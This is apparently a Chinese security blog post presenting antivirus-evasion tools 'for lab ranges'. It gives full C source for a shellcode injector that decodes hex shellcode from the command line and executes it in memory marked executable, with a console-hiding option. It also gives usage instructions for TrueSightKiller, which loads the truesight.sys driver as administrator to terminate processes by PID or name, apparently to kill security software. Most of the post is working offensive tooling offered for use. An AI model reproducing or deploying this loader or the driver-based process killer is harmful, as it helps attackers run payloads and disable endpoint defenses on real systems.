靶场专用免杀工具

工具
SimpleShellcodeInjector

代码

bash 复制代码
#include <stdio.h>
#include <Windows.h>
int main(int argc, char* argv[]) {
   // HWND hWnd = GetConsoleWindow();
   // ShowWindow( hWnd, SW_HIDE );
    unsigned int char_in_hex;
    char* shellcode = argv[1];
    unsigned int iterations = strlen(shellcode);
    unsigned int memory_allocation = strlen(shellcode) / 2; 
    for (unsigned int i = 0; i < iterations - 1; i++) {
        sscanf(shellcode + 2 * i, "%2X", &char_in_hex);
        shellcode[i] = (char)char_in_hex;
    }
    void* exec = VirtualAlloc(0, memory_allocation, MEM_COMMIT, PAGE_READWRITE);
    memcpy(exec, shellcode, memory_allocation);
    DWORD ignore;
    VirtualProtect(exec, memory_allocation, PAGE_EXECUTE, &ignore);
    (*(void (*)()) exec)();
    return 0;
}

TrueSightKiller

自行编译后,将truesight.sys与编译之后的exe放在同一目录下,以管理员权限运行cmd

-p 指定pid,-n指定进程名


相关推荐
花木偶11 分钟前
小迪网安:APP攻防-Day1
安全·小程序
爱吃糖的小秦同学15 分钟前
夸克网盘网盘空间不准确处理方案
安全
Rhystt25 分钟前
furryCTF题解|Web方向|ezmd5、猫猫最后的复仇
android·前端·web安全·web
Bruce_Liuxiaowei29 分钟前
从域名到IP:DNS解析过程与安全防护详解
网络协议·tcp/ip·安全
ShoreKiten31 分钟前
ctfshowweb入门 SSTI模板注入专题保姆级教程(三)
web安全·ssti·ctfshow
Jerry_Gao9212 小时前
【CTF】【ez-upload】FrankenPHP(v1.11.1)Unicode路径解析漏洞
安全·php·ctf·frankenphp
@hdd10 小时前
生产环境最佳实践:资源管理、高可用与安全加固
安全·云原生·kubernetes
AC赳赳老秦14 小时前
文旅AI趋势:DeepSeek赋能客流数据,驱动2026智慧文旅规模化跃迁
人工智能·python·mysql·安全·架构·prometheus·deepseek
Bruce_Liuxiaowei17 小时前
深入剖析 Windows 网络服务:用 witr 一键溯源所有监听端口
windows·安全·系统安全
сокол18 小时前
【网安-Web渗透测试-漏洞系列】RCE漏洞
web安全·php